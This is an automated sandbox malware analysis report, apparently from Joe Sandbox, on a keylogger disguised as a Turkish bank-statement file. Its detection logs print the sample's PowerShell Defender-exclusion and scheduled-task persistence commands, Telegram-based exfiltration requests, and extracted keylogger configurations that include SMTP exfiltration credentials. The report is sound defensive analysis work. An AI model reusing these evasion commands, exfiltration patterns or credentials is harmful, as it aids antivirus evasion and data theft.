1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 48 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe, ParentProcessId: 2212, ParentProcessName: Hesap_Hareketleri_10122024_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", ProcessId: 1172, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe, ParentImage: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe, ParentProcessId: 7312, ParentProcessName: UDYiGmDlq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp", ProcessId: 7572, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe, ParentProcessId: 2212, ParentProcessName: Hesap_Hareketleri_10122024_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp", ProcessId: 2292, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe, ParentProcessId: 2212, ParentProcessName: Hesap_Hareketleri_10122024_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", ProcessId: 1172, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe", ParentImage: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe, ParentProcessId: 2212, ParentProcessName: Hesap_Hareketleri_10122024_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp", ProcessId: 2292, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T14:07:37.424116+0100	2803305	3	Unknown Traffic	192.168.2.5	49754	104.21.67.152	443	TCP
2024-12-10T14:07:42.784056+0100	2803305	3	Unknown Traffic	192.168.2.5	49772	104.21.67.152	443	TCP
2024-12-10T14:07:53.192135+0100	2803305	3	Unknown Traffic	192.168.2.5	49812	104.21.67.152	443	TCP
2024-12-10T14:07:56.282055+0100	2803305	3	Unknown Traffic	192.168.2.5	49821	104.21.67.152	443	TCP
2024-12-10T14:07:58.454266+0100	2803305	3	Unknown Traffic	192.168.2.5	49829	104.21.67.152	443	TCP
2024-12-10T14:07:59.443577+0100	2803305	3	Unknown Traffic	192.168.2.5	49835	104.21.67.152	443	TCP
2024-12-10T14:08:01.817842+0100	2803305	3	Unknown Traffic	192.168.2.5	49841	104.21.67.152	443	TCP
2024-12-10T14:08:04.954427+0100	2803305	3	Unknown Traffic	192.168.2.5	49850	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T14:07:33.021985+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-10T14:07:35.972279+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-10T14:07:38.284711+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49756	132.226.247.73	80	TCP
2024-12-10T14:07:38.940982+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49757	132.226.247.73	80	TCP
2024-12-10T14:07:41.144099+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49756	132.226.247.73	80	TCP
2024-12-10T14:07:42.034753+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49771	132.226.247.73	80	TCP
2024-12-10T14:07:44.331590+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49779	132.226.247.73	80	TCP
2024-12-10T14:07:47.503488+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49788	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 16.2.UDYiGmDlq.exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: Hesap_Hareketleri_10122024_html.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Hesap_Hareketleri_10122024_html.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49746 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49763 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49856 version: TLS 1.2

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Qqvl.pdbSHA256< source: Hesap_Hareketleri_10122024_html.exe, UDYiGmDlq.exe.1.dr
Source:	Binary string: Qqvl.pdb source: Hesap_Hareketleri_10122024_html.exe, UDYiGmDlq.exe.1.dr

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 4x nop then jmp 07B397C5h	1_2_07B38E28
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 4x nop then jmp 07B397C5h	1_2_07B39196
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 4x nop then jmp 02B3F8E9h	10_2_02B3F631
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 4x nop then jmp 02B3FD41h	10_2_02B3FA88
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 07298A6Dh	11_2_072980D0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 07298A6Dh	11_2_0729843E
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 0189F8E9h	16_2_0189F631
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 0189FD41h	16_2_0189FA88
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E90D0Dh	16_2_06E90B30
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E91697h	16_2_06E90B30
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E931E0h	16_2_06E92DC8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E92C19h	16_2_06E92968
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9E959h	16_2_06E9E6B0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_06E90673
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9E501h	16_2_06E9E258
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9E0A9h	16_2_06E9DE00
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9F661h	16_2_06E9F3B8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9F209h	16_2_06E9EF60
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9EDB1h	16_2_06E9EB08
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9D3A1h	16_2_06E9D0F8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9CF49h	16_2_06E9CCA0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_06E90040
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_06E90853
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9FAB9h	16_2_06E9F810
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9DC51h	16_2_06E9D9A8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E9D7F9h	16_2_06E9D550
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 4x nop then jmp 06E931E0h	16_2_06E9310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:08:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:37:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49779 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49788 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49756 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49771 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49757 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49772 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49812 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49821 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49841 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49835 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49850 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49829 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49746 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49763 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:08:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:37:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
